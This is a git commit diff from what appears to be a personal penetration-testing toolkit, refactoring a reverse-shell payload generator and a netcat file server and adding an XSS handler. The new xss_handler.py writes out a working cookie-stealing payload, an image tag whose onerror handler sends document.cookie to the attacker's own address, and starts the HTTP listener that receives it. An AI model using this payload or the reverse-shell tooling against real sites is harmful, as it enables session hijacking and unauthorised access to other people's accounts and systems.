xss + utils

2020-06-02 14:15:03 +02:00 · 2020-06-02 14:15:03 +02:00 · 712b851f36
commit 712b851f36
parent df2a089a85
5 changed files with 107 additions and 29 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1 @@
+__pycache__
--- a/genRevShell.py
+++ b/genRevShell.py
@ -3,16 +3,7 @@
 import socket
 import sys
 import subprocess
-import netifaces as ni
-
-def getLocalAddress():
-    interface = "tun0"
-    if not interface in ni.interfaces():
-        interface = ni.interfaces()[0]
-
-    addresses = ni.ifaddresses(interface)
-    address = addresses[next(iter(addresses))][0]["addr"]
-    return address
+import util

 def generatePayload(type, local_address, port):

@ -38,14 +29,23 @@ def generatePayload(type, local_address, port):

 if __name__ == "__main__":

-    if len(sys.argv) < 3:
-        print("Usage: %s <type> <port>" % sys.argv[0])
+    if len(sys.argv) < 2:
+        print("Usage: %s <type> [port]" % sys.argv[0])
        exit(1)

-    listen_port = int(sys.argv[2])
+    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
    payload_type = sys.argv[1].lower()

-    local_address = getLocalAddress()
+    local_address = util.getAddress()
+
+    # choose random port
+    if listen_port is None:
+        sock = util.openServer(local_address)
+        if not sock:
+            exit(1)
+        listen_port = sock.getsockname()[1]
+        sock.close()
+
    payload = generatePayload(payload_type, local_address, listen_port)

    if payload is None:
--- a/upload_file.py
+++ b/upload_file.py
@ -1,7 +1,8 @@
-import socket
+#!/usr/bin/python
+
 import sys
 import os
-import netifaces as ni
+import util

 if len(sys.argv) < 2:
    print("Usage: %s <file> [port]" % sys.argv[0])
@ -9,22 +10,16 @@ if len(sys.argv) < 2:

 # Create a TCP/IP socket
 FILENAME = sys.argv[1]
-sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

-interface = "tun0"
-if not interface in ni.interfaces():
-    interface = ni.interfaces()[0]
+# Bind the socket to the port or choose a random one
+address = util.getAddress()
+port = None if len(sys.argv) < 3 else int(sys.argv[2])
+sock = util.openServer(address, port)
+if not sock:
+    exit(1)

-addresses = ni.ifaddresses(interface)
-address = addresses[next(iter(addresses))][0]["addr"]
-
-# Bind the socket to the port
-port = 8888 if len(sys.argv) < 3 else int(sys.argv[2])
-server_address = (address, port)
-sock.bind(server_address)
-sock.listen(1)
 print("Now listening, download file using:")
-print('nc %s %d > %s' % (address, port, os.path.basename(FILENAME)))
+print('nc %s %d > %s' % (address, sock.getsockname()[1], os.path.basename(FILENAME)))
 print()

 while True:
--- a/util.py
+++ b/util.py
@ -0,0 +1,37 @@
+import random
+import socket
+import netifaces as ni
+
+def getAddress(interface="tun0"):
+    if not interface in ni.interfaces():
+        interfaces = ni.interfaces()
+        interfaces.remove('lo')
+        interface = interfaces[0]
+
+    addresses = ni.ifaddresses(interface)
+    address = addresses[ni.AF_INET][0]["addr"]
+    return address
+
+def openServer(address, ports=None):
+    listenPort = None
+    retry = True
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    while retry:
+
+        if isinstance(ports, int):
+            listenPort = ports
+            retry = False
+        elif isinstance(ports, range):
+            listenPort = random.randint(ports[0],ports[-1])
+        elif ports is None:
+            listenPort = random.randint(10000,65535)
+
+        try:
+            sock.bind((address, listenPort))
+            sock.listen(1)
+            return sock
+        except Exception as e:
+            if not retry:
+                print("Unable to listen on port %d: %s" % (listenPort, str(e)))
+            raise e
--- a/xss_handler.py
+++ b/xss_handler.py
@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+import util
+import sys
+import http.server
+import socketserver
+
+def generatePayload(type, address, port):
+    if type == "img":
+        return '<img src="#" onerror="javascript:document.location=\'http://%s:%d/?x=\'+document.cookie">' % (address, port)
+    else:
+        return None
+
+if __name__ == "__main__":
+
+    if len(sys.argv) < 2:
+        print("Usage: %s <type> [port]" % sys.argv[0])
+        exit(1)
+
+    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
+    payload_type = sys.argv[1].lower()
+
+    local_address = util.getAddress()
+
+    # choose random port
+    if listen_port is None:
+        sock = util.openServer(local_address)
+        if not sock:
+            exit(1)
+        listen_port = sock.getsockname()[1]
+        sock.close()
+
+    payload = generatePayload(payload_type, local_address, listen_port)
+    if not payload:
+        print("Unsupported payload type, choose one of: img")
+        exit(1)
+
+    print("Payload:")
+    print(payload)
+    print()
+
+    Handler = http.server.SimpleHTTPRequestHandler
+    with socketserver.TCPServer((local_address, listen_port), Handler) as httpd:
+        print("serving at port", listen_port)
+        httpd.serve_forever()